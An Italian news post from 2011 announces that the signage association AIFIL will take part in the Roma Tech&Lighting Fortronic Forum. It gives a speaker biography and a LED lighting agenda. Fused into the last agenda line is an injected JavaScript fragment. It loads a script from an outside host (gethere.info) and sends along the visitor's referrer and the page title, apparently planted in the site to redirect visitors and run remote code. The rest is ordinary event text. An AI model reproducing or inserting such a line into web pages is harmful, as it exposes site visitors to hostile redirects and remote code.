Il 1 dicembre Aifil partecipa al Roma Tech&Lighting Fortronic Forum

di Redazione AIFIL[IN]FORMA - 28 novembre 2011
Classificato in: CIT, Convegni, Dibattiti, Eventi, Mondo Insegne | Tag: , , ,

Il 1 dicembre 2011, presso il Centro Congressi Acea La Fornace di Roma, avrà luogo un evento promosso da Assodel (Associazione Nazionale Fornitori Elettronica) in cui AIFIL l’ing. Massimo Peirone del Comitato Tecnico di AIFIL, interverrà sui temi dell’efficienza luminosa, del risparmio energetico e delle relative soluzioni tecnologiche e tecniche nelle insegne.

Sarà possibile dialogare con esponenti di AIFIL e acquistare una copia di “Insegne a LED: facciamo Luce” (il nuovissimo manuale di AIFIL dedicato alla costruzione a norma di insegne con sorgenti LED) o altri prodotti dell’editoria AIFIL.

Il 1 dicembre 2011, Aifil invita gli Associati a partecipare alla Roma Tech&Lighting Fortronic Forum un Focus su insegnistica, segnaletica e illuminazione pubblica che avrà luogo presso il – Centro Congressi di Acea La Fornace , Via dell’Equitazione, 32 – Roma.

Un importante appuntamento con l’elettronica e le tecnologie per il lighting promosso da Assodel con il patrocinio di Roma Capitale e della Regione Lazio.

La manifestazione è strutturata come una mostra convegno con conferenza, dibattiti e workshop organizzati dal C.T. Assodel. In più ci sarà una “community area” per l’incontro tra la domanda e l’offerta dedicata agli aggiornamenti tecnologici e alle novità di prodotto.

A completare il forum, un “educational support” di seminari formativi e tutorial applicativo-progettuali per gli approfondimenti e, nell’Arena Formazione, corsi divulgativi “snelli” e domande/risposte sull’utilizzo dei LED per l’utente non tecnico.

Aifil interverrà con un incontro dedicato all’efficienza, al risparmio energetico e alle relative soluzioni in ambito di illuminazione pubblica, insegnistica e segnaletica all’interno della zona “Energy Saving Arena”.

In particolare, interverrà Massimo Peirone con un intervento sull’uso della tecnologia LED nelle insegne luminose.

Masimo Peirone è ingegnere elettrotecnico, docente presso il Politecnico di Torino dal 1993, consulente di numerose aziende che operano nel settore insegne luminose si occupa attivamente delle problematiche di sicurezza elettrica e dell’ambiente di lavoro per il settore insegne, dal 1999 è referente del Comitato Tecnico AIFIL e membro del CEI, Comitato Elettrotecnico Italiano, comitati 64 e 34.

Durante la manifestazione, sarà possibile incontrare rappresentanti di AIFIL presso la loro postazione, all’interno dell’area espositiva e avere una copia del nuovissimo manuale AIFIL “Insegne a LED: facciamo Luce”, uno strumento indispensabile per il lavoro quotidiano e la crescita professionale e imprenditoriale di tutti i costruttori d’insegne.

Ricordiamo a tutti che la partecipazione è gratuita, previa registrazione on-line

Per maggiori informazioni sulla manifestazione:

www.fortronic.it

Ecco l’agenda della giornata, che però è ancora in  fase di definizione:

CONFERENZA PLENARIA – dalle ore 09.45

09.45La tecnologia LED: stato dell’arte e prospettive di mercato
Franco Musiari, Direttore Tecnico Assodel
Uno sguardo allo stato dell’arte della tecnologia dei LED, una panoramica delle problematiche da affrontare nella progettazione ed una stima delle prospettive di mercato della tecnologia del Solid State Lighting.

10.00 -  L’hardware del sistema luce: gli apparecchi, i sostegni, il design
Università La Sapienza

10.20 -  Quality light comes from quality driver
iWatt Inc. by Acsel Electronics
There are many challanges in designing the driving circuitry for Solid-State Lighting application. The selection of the driver’s topology is only the starting step but there are many additional consideration points to be taken into account to get an efficient and reliable product. Single or double stage; isolated or non isolated, which lamp safety regulation apply, which efficiency standard, etc.

10.40 – Per il General Lighting l’evoluzione proposta da Seoul Semiconductor
Carlo Romiti, general Manager Italy Seoul Semiconductor by Silica
Il mercato vuole luminosità più elevate da ogni singolo elemento emittente (LED) per ridurre il numero di dispositivi da utilizzare, richiede una migliore rispondenza ai colori, ovvero un indice di resa cromatica – CRI (Color Rendering Index) – sempre migliore, e almeno superiore ad 80, senza dimenticare affidabilità, vita operativa e dissipazione termica. Seoul Semiconductor continua sulla strada del miglioramento dei suoi prodotti per rispondere al mercato.

11.00 – Coffee Break

11.30 – Nuove sorgenti LED avanzano nel general lighting
LG Innotek, by Welt Electronic
La costante ricerca svolta dai leader della tecnologia sta portando sul mercato nuove famiglie di prodotti con maggiore efficienza, flussi luminosi più elevati senza dimenticare parametri altri aspetti del design. Questo Forum è l’occasione per presentare le tecnologie innovative – epiwafer da 6”, Multi-Rank-Mixing (MRM), Photo-Luminescent-Film (PLF), Micro-Lens-Array (MLA) – adottate la LG Innotek per i suoi LED Mid/High Power.

11.50 – La Fotometria nei sistemi SSL: grandezze, fondamenti, soluzioni.
Stefano Scalzi, Torand Consulting
La fotometria è la disciplina che misura la luce emessa da una qualsiasi sorgente luminosa ed è quindi fondamentale per una corretta descrizione dei corpi illuminanti. Durante la presentazione si analizzeranno: a) le grandezze di interesse; b) geometrie ed acquisizioni; c) soluzioni per la realizzazione di una corretta fotometria. Il tutto verrà completato con alcuni esempi applicativi.

12.10 – Un nuovo protocollo nato per il controllo remoto nella illuminazione stradale.
Gianfranco Patierno, FAE Comprel
Molti protocolli wireless si sono proposti anche per l’applicazione nella illuminazione stradale ma, non essendo espressamente nati per questo scopo, presentano diverse limitazioni. Il G3P-HAMP e’ un nuovo concetto di protocollo nato espressamente per reti lineari – tipiche delle lunghe sequenze di lampioni stradali – che offre la soluzione ideale in questo tipo di applicazione.

ENERGY SAVING ARENA
Area dedicata  all’efficienza e al risparmio energetico in cui si alterneranno interventi rivolti sia alle amministrazioni pubbliche che alle imprese locali, in particolare:

Agenda mattina:
•    Il ruolo della P.A. nel processo di innovazione tecnologica e di risparmio energetico dell’illuminazione pubblica – a cura dell’On. G. Casciani, Presidente II Commissione Affari comunitari e internazionali della Regione Lazio
•    I casi di successo per il risparmio energetico nella Regione Lazio
•    I tool di sviluppo per gli illuminotecnici – a cura del Prof. G. Forcolini, Dip. Indaco Politecnico Milano

Agenda pomeriggio a partire dalle 14.00
•    L’uso della tecnologia LED nelle insegne luminose – a cura del consulente tecnico Aifil, M. Peirone
•   L’illuminazione stradale a Roma – 
a cura dell’Ing. G. Daniele, Amministratore Unico di Acea

•    Tempo di ritorno sull’investimento di impianti di illuminazione a LED – 
a cura di Andrea Flumiani, coordinatore Gruppo Lighting Assodels.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed